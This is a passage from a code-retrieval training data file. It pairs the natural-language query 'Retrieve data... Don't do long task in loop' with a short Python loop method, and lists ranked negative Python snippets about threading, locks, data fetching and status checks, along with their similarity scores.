fcntl.lockf(fd, fcntl.LOCK_UN)\n os.close(fd)" ]
[ "0.7924762", "0.7834396", "0.77969474", "0.77904904", "0.74435604", "0.74268526", "0.73679256", "0.7322436", "0.7123128", "0.7118452", "0.71132535", "0.709967", "0.7089947", "0.70288163", "0.7005624", "0.699237", "0.6928809", "0.6910996", "0.6896251", "0.687286", "0.6866911", "0.68550605", "0.68550605", "0.68473834", "0.68452495", "0.6841358", "0.680688", "0.6780136", "0.67540735", "0.67366713", "0.6666398", "0.6655856", "0.6655782", "0.66313845", "0.66064906", "0.65943927", "0.65206957", "0.64731157", "0.64648455", "0.64635146", "0.6462833", "0.6457605", "0.6444689", "0.6438286", "0.64284575", "0.63600004", "0.6326293", "0.6296386", "0.6247347", "0.6236592", "0.620765", "0.6198268", "0.6198256", "0.61879337", "0.6177789", "0.6177462", "0.6177462", "0.6177462", "0.6170981", "0.61652935", "0.61620617", "0.61590546", "0.61140126", "0.6093962", "0.6066924", "0.6045754", "0.6022716", "0.6017603", "0.60098296", "0.6009101", "0.59990793", "0.59944475", "0.59919226", "0.59729135", "0.5960233", "0.5936036", "0.59347486", "0.5856131", "0.5852433", "0.58360857", "0.58233374", "0.58008486", "0.5796706", "0.57867676", "0.57655007", "0.5740402", "0.5734545", "0.5731939", "0.5723791", "0.5716259", "0.56916606", "0.5679157", "0.56678206", "0.562634", "0.5625524", "0.5610949", "0.5609698", "0.56080246", "0.56078565", "0.56043065" ]
0.8140664
0
Get status of the lock
def bus_locked(self): return self._bus_lock.locked()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lock_status(self) -> Dict[str, str]:\n self.__logger.debug('Eva.lock_status called')\n return self.__http_client.lock_status()", "def getstatus(self):\n with self.lock:\n return (self.status, self.time_start)", "def get_raw_status(self):\n self.__param_lock.acquire()\n status = self.__status\n self.__param_lock.release()\n return status", "def get_lock(self):\n function_string = 'IFLOCK'\n self.scpi_comm(function_string)\n function_string = 'IFLOCK?'\n status = int(self.scpi_comm(function_string))\n return_message = \"\"\n if status == 0:\n return_message = \"Not successful\"\n if status == -1:\n return_message = \"Device already locked\"\n if status == 1:\n return_message = \"Lock acquired\"\n return return_message", "def get_lock(self):\n \n svc = \"urn:micasaverde-com:serviceId:DoorLock1\"\n if not svc in self.services:\n raise RuntimeError, \"Device doesn't support the service\"\n \n status = self.get_variable(svc, \"Status\")\n return status == 1", "def status(self):\n with self.__lock:\n assert(self.__complete)\n return self.__status", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def locked(self):\n with self._block:\n status = repr(self).split(maxsplit=1)[0][1:]\n assert status in ('locked', 'unlocked')\n return status == 'locked'", "async def get_status():", "def getstatus(self):\n return self.__status", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def _get_status(self):\n return self.__status", "def is_locked(self) -> bool | None:\n if self._node.status is None:\n return None\n return VALUE_TO_STATE.get(self._node.status)", "def get_status(self):\n return self._status", "def GetStatus(self):\r\n return self.status", "def lock(self):\r\n return self._lock", "def status(self):\n self._refresh_state()\n return self._data.get('status')", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def getStatus(self):\n return self.__status", "def status(self):\n\t\treturn self._status", "def lock(self):\n return self._lock", "def get_status(self):\n return self.read_register(259, 0, 3)", "def is_locked(self):\r\n pass", "def get_state(self):\n if not self._variable.get():\n return \"Locked\"\n\n elif self._variable.get():\n return \"Unlocked\"", "def status(self):\r\n return self._status", "def status(self):\r\n return self._status", "def status(self):\n return self.get(self._names[\"status\"])", "def query_lock_status(self):\n fl_vars = self.query('FL_PrintVars')\n #The manual doesn't give enough information to extract the intensity\n # some experimentation required\n intensity = int(fl_vars[0:3]) #??? Can the string be sliced like this,\n # or do we need to cut it at a comma?\n # Intensity is the first value? followed by x\n # and y positions\n if intensity < self.int_thresh:\n self.locked = False\n else:\n self.locked = True\n return self.locked", "def get_status(self):\n return self.o.read_register(self.dev_id, STATUS)", "def getStatus(self):\n return self._status", "def locked(self):\n return self.__lock.locked()", "def v_locked(self):\n return self._locked", "def status(self):\n return self.__status", "def status(self):\n return self.__status", "def locked(self):\n\t\treturn self.__locked", "def locked(self):\n return self.is_locked", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def get_status(self):\n return self._refreshed", "def get_status(self):\n # TODO retrieve from db if not set\n return self.status", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def status(self):\n return self.m.status", "def is_locked(self) -> bool:\n return bool(self._node.status)", "def status(self):\n return self.status", "def locked(self):\n return self._filelock.locked", "def status(self):\n if hasattr(self, \"_status\"):\n return self._status\n else:\n return None", "def locked(self):\n return self.partner_state.locked.outstanding", "def is_locked(self):\n return cache.get(self.id)", "def status(self):\n return self.job_proto.status", "def lock(self):\n print(\"DEPRECATED lock\")\n return self._operations.lock()", "def status(self):\n return self._get(path='status')", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def is_locked(self):\n ret_val = self._is_locked()\n return ret_val", "def lock_for_update(self):\n return self.lock(True)", "async def get_status(self) -> str:\n return await self.hw_device.status()", "def svn_info_t_lock_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def status(self):\n return self.state", "def getStatus():", "def status(self):\n assert(self.__complete)\n return self.__status", "def is_locked(self):\n return self._is_locked", "def status(self):\n return STATUS[self.fields['status']]", "def status(self) -> dict[str, str] | None:\n return self._status", "def check_status(self):\n return self.status", "def check_status(self):\n return self.status", "def getStatus(self, key, time):\n return self.get(\"status\", key, time)", "def status(self):\n return self._dbattr('status')", "def status(self):\n return self._data['status']", "def check_lock_server(self):\n file_locked = True\n while file_locked:\n response = requests.get(LOCK_SERVER_ADDR+\"getLockStatus\", {'file_path': self.filename, 'user_id': self.user_id})\n if response.json()['file_locked']:\n file_locked = True\n time.sleep(5)\n else:\n file_locked = False\n return", "def set_lock_status(use_lock):\r\n get_lock.lock_is_enabled = use_lock", "def membership_lock(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"membership_lock\")", "def is_locked(self):\n return bool(int(self._fp(self.F_LOCKED).read()))", "def status(self, nick, channel):\n lockeditems = sorted([item[0] for item in self.locks.items() if item[1].owner])\n if len(lockeditems) == 0:\n return (channel, \"There are no locked resources\")\n else:\n messages = []\n messages += [(channel, \"Status of locked resources:\")]\n for k in lockeditems:\n l = self.locks[k]\n msg = \" resource: %s owner: %s\" % (k, l.owner)\n if l.waiters:\n msg += \" waiters: %s\" % ','.join(l.waiters)\n messages += [(channel, msg)]\n\n return messages", "def status(self):\n return status_dict[self._get_property_(self.STATUS).upper()]" ]
[ "0.79571366", "0.72897905", "0.72555906", "0.72103953", "0.70631886", "0.7003551", "0.6984304", "0.6949121", "0.69234353", "0.69027823", "0.6886226", "0.6849591", "0.68323433", "0.67312163", "0.6725681", "0.67219126", "0.67061067", "0.6695192", "0.6695192", "0.6695192", "0.6650901", "0.66427946", "0.6623583", "0.6611583", "0.66026044", "0.65920943", "0.6572267", "0.6572267", "0.6560384", "0.6556241", "0.65547717", "0.65512", "0.65488905", "0.6547976", "0.65383875", "0.65383875", "0.65315455", "0.6515429", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.64699835", "0.6468892", "0.6468311", "0.6451013", "0.6451013", "0.6451013", "0.6441245", "0.64159465", "0.64115417", "0.64112896", "0.64074075", "0.6406501", "0.64040387", "0.63855577", "0.63778806", "0.6367143", "0.6357712", "0.6357712", "0.6357712", "0.6355548", "0.6343025", "0.6340898", "0.63288647", "0.6328085", "0.63232017", "0.6323201", "0.6320744", "0.631853", "0.63181204", "0.6315422", "0.6315422", "0.6313379", "0.6312854", "0.63036543", "0.6261145", "0.6255947", "0.6248634", "0.6243344", "0.6238525", "0.6236991" ]
0.0
-1
Retrieve data Don't do long task in loop. Use a separated thread to not perturbate the nodeman
def loop(self, stopevent): for bus in self.buses: self.buses[bus].loop(stopevent)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_data_thread(self, ip):\n get_data_thread = Thread(target=self.get_data, args=[ip])\n get_data_thread.start()", "def fetch_data():\n data.fetch_data()\n data.start_updating()", "def main(self):\n while True:\n if not self.data_server_command.empty():\n command_data_server = self.data_server_command.get()\n if command_data_server[0] == 4:\n thread.start_new_thread(self.get_file, (command_data_server[1],))\n else:\n self.data_server_command_def[command_data_server[0]](command_data_server[1])", "def _receive_lymphocytes(self):\n getter_thread = GetterThread(self.nodes_manager.get_next_node_address(),\n self._set_lymphocytes_to_return)\n getter_thread.start()", "def run(self):\n while(not self.stop_event.is_set()):\n # read values until stop is sent\n response1 = _read_once(1,self.serial)\n response2 = _read_once(2,self.serial)\n #print(response)\n self.data1[\"d\"].append(response1) # Push response to the data list for later\n self.data2[\"d\"].append(response2) # Push response to the data list for later\n curTime = time.time()\n self.data1[\"t\"].append(curTime)\n self.data2[\"t\"].append(curTime)\n #sleep(0.0001) # I need to be small enough to capture peaks.\n return", "async def fetch_data(self) -> T:", "def fetch_data(self):", "def run(self):\n\n import time\n LOGGER.info(\"Caching thread started !\")\n\n while True:\n\n # Get all data\n # Make data visible from parent thread\n self.data = self._forge_data(self._sqla_session)\n\n # Wait 30 seconds before new processing\n time.sleep(cm.DELAY)", "def _fetch_data(self):\n pass", "def run(self):\n while True:\n if self.job_q.empty():\n self.message_q.put(False)\n return\n try:\n smolecule = self.job_q.get()\n self.data_pointer[smolecule].get_adp(self.Temp)\n except IndexError:\n self.message_q.put((smolecule, None))\n try:\n self.message_q.put((smolecule, [j.adp['cart_int'] for j in self.data_pointer[smolecule].atoms]))\n except KeyError:\n # =======================================================\n # self.message_q.put((molecule,[0 for i in self.data_pointer[molecule].atoms]))\n #=======================================================\n pass", "def main_loop(self):\n # main loop...don't ever exit\n while True:\n # collect data\n # get the time...the local clock is set with NTP regularly\n self._get_time()\n \n # get the latest metar data from the closest location\n self._get_metar()\n \n # get the latest fence station data\n self._get_fence_station()\n \n # get the lastest roof station data\n #METAR self._get_roof_station()\n \n # publish the data to our data file\n self.write_data_files()\n \n # show the user we are running\n print(\"{:s}\".format(datetime.datetime.now(pytz.UTC).strftime(\"%Y-%m-%d %H:%M:%S.%f\")), end=\"\\r\", flush=True)\n \n # wait a bit for the next loop\n time.sleep(3.0)\n \n return", "def run(self):\r\n self.collect_data()", "async def main():\n async with aiohttp.ClientSession() as session:\n data = Luftdaten(SENSOR_ID, loop, session)\n await data.get_data()\n\n if not await data.validate_sensor():\n print(\"Station is not available:\", data.sensor_id)\n return\n\n if data.values and data.meta:\n # Print the sensor values\n print(\"Sensor values:\", data.values)\n\n # Print the coordinates fo the sensor\n print(\"Location:\", data.meta['latitude'], data.meta['longitude'])", "def data_collection():\n global PAUSED\n print(\"Detecting nodes\")\n while True:\n data = SOCK.recvfrom(1024)[0] # buffer size is 1024 bytes\n message = data.decode()\n try:\n message_function = message[0]\n message = message[1:]\n \n if message_function == \"t\":\n loc, temp, hum = message.split(\", \")\n temp = (float(temp) * 1.8) + 32 # convert from C to F\n\n # Checks if location is alreay in the rolling_X dictionarys. If not, it creates an entry\n # in the dictionary and populates it with the defaults\n if loc not in ROLLING_TEMPS:\n ROLLING_TEMPS[loc] = copy(TEMPDEQUEDEFAULT)\n print(loc, \"has connected\")\n if loc not in ROLLING_HUMS:\n ROLLING_HUMS[loc] = copy(HUMDEQUEDEFAULT)\n\n # Append new temp and humidity to appropriate deque in dictionaries\n ROLLING_TEMPS[loc].appendleft(temp)\n ROLLING_HUMS[loc].appendleft(hum)\n LAST_RECEIVED[loc] = datetime.datetime.utcnow()\n \n elif message_function == \"c\":\n if message == \"pause\":\n PAUSED = True\n print(\"pausing\")\n elif message == \"unpause\":\n PAUSED = False\n print(\"unpausing\")\n else:\n print(\"unknown command function\")\n elif message_function == \"i\":\n if message == \"status\":\n print(\"Paused:\", PAUSED)\n else:\n print(\"unknown info function\")\n except:\n print(\"malformed data\")", "async def readrawdataTask():\n while 1:\n ## do some updating\n readrawdata()\n await asyncio.sleep(readperiod)", "def _obtain(self):\n\n while True:\n # make sure we're observing load maximums\n if self.max_load is not None:\n try:\n load = os.getloadavg()\n if jobserver_running_jobs() > 0 and load[1] > self.max_load:\n time.sleep(0.01)\n continue\n except NotImplementedError:\n pass\n\n # make sure we're observing memory maximum\n if self.max_mem is not None:\n mem_used, mem_total = memory_usage()\n mem_percent_used = 100.0 * float(mem_used) / float(mem_total)\n if jobserver_running_jobs() > 0 and mem_percent_used > self.max_mem:\n time.sleep(0.01)\n continue\n\n # get a token from the job pipe\n try:\n token = os.read(self.job_pipe[0], 1)\n return token\n except OSError as e:\n if e.errno != errno.EINTR:\n raise", "def run(self):\n # sends download range from offset to offset + block_size - 1 (including) in the header\n headers = {'User-Agent': self.user_agent, 'Refferer': '{}://{}/'.format(self.url.protocol, self.url.host), \n 'Range': 'bytes={}-{}'.format(self.offset, self.offset + self.block_size - 1)}\n status = 0 # set status to 0 that means a connection error\n try:\n self.conn.request('GET', self.url.request, headers=headers)\n response = self.conn.getresponse()\n # the server does not support partial downloading - error\n if response.status != 206:\n status = response.status\n raise MirrorError\n part_size = int(response.getheader('Content-Length')) # actual count of bytes sent by the server\n data = b'' # data buffer\n # loop while all data will be received\n while part_size > len(data):\n if self.cancelled.is_set(): # if the thread has been cancelled\n # stop the thread, the TaskError would not be processed\n # because a loop in the main thread already broken\n raise Exception\n data_fragment = response.read(self.FRAGMENT_SIZE)\n data += data_fragment # add data to the buffer\n # put progress information into the queue\n info = TaskProgress(self.url.host, response.status, len(data))\n self.data_queue.put(info)\n # when the downloading loop finished, create TaskData object\n info = TaskData(self.url.host, response.status, self.offset, data)\n response.close()\n except:\n # if an error has occurred - create a TaskError object\n info = TaskError(self.url.host, status, self.offset)\n finally:\n self.data_queue.put(info) # put result TaskInfo object into the queue\n self.ready.set() # mark the thread as comleted", "def get_data():\n pass", "def process_thread(self):", "def get_data(self):\n if self.random_seeds: \n self._validate_random_seeds()\n seed_iter = list(map(iter,self.random_seeds))\n nsamples = len(self.random_seeds[0])\n else:\n seed_iter = None\n nsamples = self.numsamples\n progress_bar = tqdm(range(nsamples))\n self._set_meta_features()\n task_dict = {}\n finished_tasks = 0\n for _ in range(min(nsamples,self.numworkers)): \n self._prepare_and_start_task(task_dict,seed_iter)\n while finished_tasks < nsamples: \n done_ids, pending_ids = ray.wait(list(task_dict.keys()))\n if done_ids:\n id = done_ids[0]\n finished_tasks += 1\n try:\n data, times, pid = ray.get(id)\n except Exception as exception:\n self.logger.info(\"task with id %s failed with Traceback:\" %task_dict[id], exc_info=True)\n raise exception\n times[-1] = time() # add getter time\n data['idx'] = task_dict.pop(id)\n self.logger.info('id %i on pid %i: finished task.' %(data['idx'],pid))\n self._log_execution_time(data['idx'], times, pid)\n if (nsamples - self._idx) > 0: # directly _schedule next task\n self._prepare_and_start_task(task_dict,seed_iter)\n progress_bar.update()\n yield data", "def run(self):\n data = ''\n while not rospy.is_shutdown():\n if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):\n rospy.logerr(\"Lost sync with device, restarting...\")\n self.requestTopics()\n self.lastsync = rospy.Time.now() \n \n flag = [0,0]\n flag[0] = self.port.read(1)\n if (flag[0] != '\\xff'):\n continue\n flag[1] = self.port.read(1)\n if ( flag[1] != '\\xff'):\n rospy.loginfo(\"Failed Packet Flags \")\n continue\n # topic id (2 bytes)\n header = self.port.read(4)\n if (len(header) != 4):\n #self.port.flushInput()\n continue\n \n topic_id, msg_length = struct.unpack(\"<hh\", header)\n msg = self.port.read(msg_length)\n if (len(msg) != msg_length):\n rospy.loginfo(\"Packet Failed : Failed to read msg data\")\n #self.port.flushInput()\n continue\n chk = self.port.read(1)\n checksum = sum(map(ord,header) ) + sum(map(ord, msg)) + ord(chk)\n\n if checksum%256 == 255:\n if topic_id == TopicInfo.ID_PUBLISHER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n self.senders[m.topic_id] = Publisher(m.topic_name, m.message_type)\n rospy.loginfo(\"Setup Publisher on %s [%s]\" % (m.topic_name, m.message_type) )\n except Exception as e:\n rospy.logerr(\"Failed to parse publisher: %s\", e)\n elif topic_id == TopicInfo.ID_SUBSCRIBER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n self.receivers[m.topic_name] = [m.topic_id, Subscriber(m.topic_name, m.message_type, self)]\n rospy.loginfo(\"Setup Subscriber on %s [%s]\" % (m.topic_name, m.message_type))\n except Exception as e:\n rospy.logerr(\"Failed to parse subscriber. %s\"%e)\n elif topic_id == TopicInfo.ID_SERVICE_SERVER:\n try:\n m = TopicInfo()\n m.deserialize(msg)\n\t\t\tservice = ServiceServer(m.topic_name, m.message_type, self)\n self.receivers[m.topic_name] = [m.topic_id, service]\n self.senders[m.topic_id] = service\n rospy.loginfo(\"Setup ServiceServer on %s [%s]\"%(m.topic_name, m.message_type) )\n except:\n rospy.logerr(\"Failed to parse service server\")\n elif topic_id == TopicInfo.ID_SERVICE_CLIENT:\n pass\n \n elif topic_id == TopicInfo.ID_PARAMETER_REQUEST:\n self.handleParameterRequest(msg)\n \n elif topic_id == TopicInfo.ID_LOG:\n self.handleLogging(msg)\n \n elif topic_id == TopicInfo.ID_TIME:\n t = Time()\n t.data = rospy.Time.now()\n data_buffer = StringIO.StringIO()\n t.serialize(data_buffer)\n self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )\n self.lastsync = rospy.Time.now()\n elif topic_id >= 100: # TOPIC\n try:\n self.senders[topic_id].handlePacket(msg)\n except KeyError:\n rospy.logerr(\"Tried to publish before configured, topic id %d\" % topic_id)\n else:\n rospy.logerr(\"Unrecognized command topic!\")\n rospy.sleep(0.001)", "def run(self):\n while True:\n # Do something\n print('Doing something imporant in the background')\n\n self.loadData()\n time.sleep(self.interval)", "async def async_update_data():\n return await hass.async_add_executor_job(read_consumption, api, entry)", "def retrieve_data():\r\n\r\n print(\"\\n[i] Running scheduled query for page {} at {}.\".format(page, ut.get_time()))\r\n # Instanciating main class for Facebook call\r\n fbs = FacebookScrapper()\r\n\r\n # Getting hourly data from Facebook\r\n data = fbs.get_page_fan_count(page=page)\r\n\r\n # Sending data to database\r\n dba.insert_data_db(data)", "def run(self):\n\n # TODO: Logic to get data, enforce request limits, and filter out duplicates", "def read(self):\n\n self.log.debug('Beginning read callback')\n info = self.poll()\n\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n\n # report information for all vCenter servers\n for vcenter, data in info.items():\n # report datastore information\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n\n # report datacenter information\n for dc_name, dc_data in data['datacenter'].items():\n # extract any cluster and host information for later processing\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n\n # report cluster information\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n\n # report host information\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n\n time.sleep(self.sleep_time)", "def run(self):\n results = self.fetch()\n return results", "def get_data():\n pass", "def get_data():\n pass", "def get_data():\n pass", "async def _fetch_data(self) -> T:\n raise NotImplementedError", "def fetch_data(swarming, start, end, state, tags):\n # Split the work in days. That's a lot of requests to do.\n queue = Queue.Queue()\n threads = []\n def run(start, cmd):\n data = json.loads(subprocess.check_output(cmd))\n queue.put((start, int(data['count'])))\n\n day = start\n while day != end:\n data = [\n ('start', int((day - _EPOCH).total_seconds())),\n ('end', int((day + datetime.timedelta(days=1)-_EPOCH).total_seconds())),\n ('state', state),\n ]\n for tag in tags:\n data.append(('tags', tag))\n cmd = [\n sys.executable, os.path.join(CLIENT_DIR, 'swarming.py'),\n 'query', '-S', swarming, 'tasks/count?' + urllib.urlencode(data),\n ]\n thread = threading.Thread(target=run, args=(day.strftime('%Y-%m-%d'), cmd))\n thread.daemon = True\n thread.start()\n threads.append(thread)\n while len(threads) > 100:\n # Throttle a bit.\n for i, thread in enumerate(threads):\n if not thread.is_alive():\n thread.join()\n threads.pop(i)\n sys.stdout.write('.')\n sys.stdout.flush()\n break\n day = day + datetime.timedelta(days=1)\n\n while threads:\n # Throttle a bit.\n for i, thread in enumerate(threads):\n if not thread.is_alive():\n thread.join()\n threads.pop(i)\n sys.stdout.write('.')\n sys.stdout.flush()\n break\n print('')\n data = []\n while True:\n try:\n data.append(queue.get_nowait())\n except Queue.Empty:\n break\n return dict(data)", "def get_data(self):\n has_next_page = True\n page = 1\n while has_next_page:\n print(f'Getting page {page}')\n response = self.get_articles(\n page=page,\n size=200,\n order_by='extracted_at',\n order_type='asc'\n )\n pagination = response.get('pagination')\n has_next_page = pagination.get('has_next')\n self.save_articles(response.get('articles'))\n page += 1\n time.sleep(2.5)", "def requestDataFromServer(self):\r\n self.tempVar = None\r\n dataAvailable = threading.Event()\r\n\r\n self.sendMessage(\"requestData\", \"\")\r\n\r\n @self.ursinaClient.event\r\n def receiveData(Content):\r\n self.ursinaClient.lock.acquire()\r\n\r\n self.tempVar = Content\r\n dataAvailable.set()\r\n\r\n self.ursinaClient.lock.release()\r\n\r\n # print(\"Len Data Recvd: \", len(Content))\r\n\r\n dataAvailable.wait()\r\n\r\n tempVar = self.tempVar\r\n\r\n del self.tempVar\r\n return tempVar", "def run(self):\n while True:\n req = self._requests.get()[1]\n req.start()\n logging.info('Running request %s', req)", "def receive_data():\n\n while True:\n try:\n bytes_to_read = ser.readline()\n print(bytes_to_read)\n data = json.loads(bytes_to_read.decode('utf-8'))\n distance = data['distance']\n print(f'distance: {distance}')\n except Exception as e:\n print(f'Error in reading bytes from the \\'duino: {e}')", "def do_fetch(self):\n pass", "def main():\n output_queue = Queue()\n\n out_list = list()\n\n logging.info('Retrieving news...')\n download = DownloadNewsWorker(output_queue)\n download.retrieve_news()\n\n while not output_queue.empty():\n item = output_queue.get()\n out_list.append(item)\n\n return out_list", "def worker_run():\n while True:\n print(\"worker: waiting for numdata_lock\")\n numdata_lock.acquire()\n print(\"worker: acquired numdata_lock\")\n print(\"The number {} is spelled '{}'\".format(numdata[\"int\"],numdata[\"name\"]))\n numdata_lock.release()\n time.sleep(1)", "def run(self):\n super().run()\n echo = self.echo\n local = self.local\n remote = self.remote\n transport = Transceiver(local)\n transport.set_timeout(0.5)\n self.__result: list[Entry] = []\n\n while True:\n try:\n packet = transport.recv(None)\n params = frame.deserialize(packet)\n seq = params[\"seq\"]\n total = params[\"total\"]\n t_master = params[\"t_master\"]\n infinite = params[\"infinite\"]\n payload = params[\"payload\"]\n\n t_slave = time.time()\n if echo:\n data_send = frame.serialize(infinite, seq, total, t_master, t_slave, payload)\n transport.send(remote, data_send)\n t_ul = (t_slave - t_master) * 1000\n self.add_result(Entry(seq, total, t_ul, 0))\n print(f\"seq = {seq}, ul = {t_ul:.2f} ms, payload: {hex_str(payload)}\")\n if frame.is_end(params):\n print(f\"receive last packet!\")\n break\n except socket.timeout:\n continue\n except KeyboardInterrupt:\n break", "def task():", "def run(self):\n print(\"%s starting up\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepMax))\n value = self.cell.read(lambda counter: self.cell.data.count)\n print(\"%s is done getting %s\" % (self.getName(), str(value)))", "def run(self):\n while True: # make sure to run at least once before exiting\n with self._lock:\n self._update(self._data)\n if self._done:\n break\n time.sleep(1)", "def get_info():\n with open('explorers.json', 'r') as file:\n block_expl_info = json.load(file)\n BLOCK_EXPL_INFO['block_explorers'] = [{'analytics': [None, None]} for i in range(len(block_expl_info))]\n analytic_thread = threading.Thread(target=get_analytics)\n analytic_thread.start()\n print(analytic_thread)\n counter_api = 0\n for elem in block_expl_info:\n print(counter_api, elem)\n api = search(block_expl_info[elem], \"api\")\n name, currency, url, best_height_key, timer = search(block_expl_info[elem], \"name\"), search(\n block_expl_info[elem], \"currency\"), search(block_expl_info[elem], \"url\"), search(block_expl_info[elem],\n \"best_height_key\"), search(\n block_expl_info[elem], \"api_limit\")\n if api:\n my_thread = threading.Thread(target=get_best_height,\n args=(name, currency, url, best_height_key, counter_api, timer))\n counter_api += 1\n my_thread.start()\n print(my_thread)\n else:\n latest_block = BLOCK_EXPL_INFO\n latest_block_list = latest_block['block_explorers']\n latest_block_list[counter_api][\"name\"] = name\n latest_block_list[counter_api][\"currency\"] = currency\n latest_block_list[counter_api][\"best_height\"] = best_height_key\n latest_block_list[counter_api][\"api\"] = None\n counter_api += 1", "def run(self, data):\n\t\t# no processing here\n\t\treturn data", "def data(self):\n\t\tself.dworker()\n\t\treturn self.d", "def run(self):\n while True :\n try:\n appinfo = self.db.hgetall(self.appname)\n appinfo_str = json.dumps(appinfo)\n data = {'applicationname':self.appname,'appinfo':appinfo_str}\n response = requests.post(REGISTRAR_URL, data=data)\n time.sleep(2)\n except :\n pass", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def run(self):\n self._started = True # Only set once to true!\n self.gui_block.set() # Unblocked by the GUI\n time.sleep(self.delay) # Should collect data before sending it\n while self._started:\n # If the application has been stopped, wait until it is unblocked\n if not self.gui_block.is_set():\n self.gui_block.wait()\n else:\n # The retriever thread is put into pause, and we wait until it\n # is actually paused. Then, we try to send the data. Finally, we\n # wake up the data retrieving thread back again.\n self.retriever.resume.clear()\n self.retriever.is_waiting.wait()\n self.send_data()\n self.retriever.resume.set()\n time.sleep(self.delay)", "async def _fetch_data(self) -> JobInfo:\n return await self.api.get_job()", "def collect_data(endless):\r\n click.echo(\"start collecting data ...\")\r\n _collect_data(endless)", "def GetData(self):\r\n if self.Error == False:\r\n Extra = {}\r\n try:\r\n result = {}\r\n temp = self.ScrapeMainWebpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeParameters1Webpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeParameters2Webpage()\r\n if temp != None:\r\n result.update(temp)\r\n temp = self.ScrapeStatusWebpage()\r\n if temp != None:\r\n result.update(temp)\r\n sqlArray = {}\r\n sqlArray[self.deviceDescr] = {}\r\n sqlArray[self.deviceDescr][self.devNumber] = {}\r\n sqlArray[self.deviceDescr][self.devNumber][\"General\"] = result\r\n sqlArray[self.deviceDescr][self.devNumber][\"_ExtractInfo\"] = {}\r\n sqlArray[self.deviceDescr][self.devNumber][\"_ExtractInfo\"][\"ExtractTime\"] = time.time()\r\n sqlArray[\"ReadError\"] = False \r\n return sqlArray\r\n \r\n except Exception as e: \r\n self.log.printError(\"ERROR in Retreiving Seatel VSAT Data,%s Module Error\" % sys._getframe().f_code.co_name) \r\n self.log.printError( str(e))\r\n self.Error = True\r\n Extra[\"ReadError\"] = True\r\n return Extra\r\n else:\r\n self.log.printWarning(\"%s skipped due to previous failure\" % sys._getframe().f_code.co_name)\r\n return None", "def _get_data(self):\n while True:\n # self.logger.debug(\"data queue size is: {}\".format(len(self._dataqueue)))\n ans = self._parser.find_first_packet(self._dataqueue[:])\n if ans:\n self._dataqueue = ans[1]\n # self.logger.debug(\"found packet of size {}\".format(len(ans[0])))\n return ans[0]\n else:\n # self.logger.debug(\"Could not find packet in received data\")\n tmp = self.conn.recv(1024)\n self._dataqueue += tmp", "def fetch(thread=False):\r\n if thread:\r\n Fetch.start()\r\n else:\r\n urlretrieve(OBSURL,ZFILE)", "def run(self):\n while True:\n letter = self.queue.get()\n course_scraper = CourseSession(self.location)\n course_scraper.scrape(letter)\n self.queue.task_done()", "def get_data():\n log = common.LogFile('', LOGFILE)\n settings = load_settings()\n keywords = settings[\"keywords\"]\n api_key = settings[\"api_key\"]\n for keyword in keywords:\n print(\"[{}] : fetching data.\".format(keyword))\n filename = \"results_{0}.json\".format(keyword)\n results = {}\n hits_limit = 500\n start_at = 1\n counter = 0\n while True:\n url = create_url(keyword, hits_limit, start_at, api_key)\n records = get_records_from_url(url)\n total_results = get_total_hits(records)\n records = split_records(records)\n records_on_page = len(records)\n if records_on_page == 0:\n break\n else:\n for record in records:\n counter += 1\n id_no = extract_id_number(record)\n processed_dict = {'ID': id_no, 'problem': []}\n processed_record = parse_record(\n record, processed_dict, log)\n if id_no not in results:\n results[id_no] = processed_record\n if counter % 100 == 0:\n print(\"Processed {} out of {}\".format(\n counter, total_results))\n 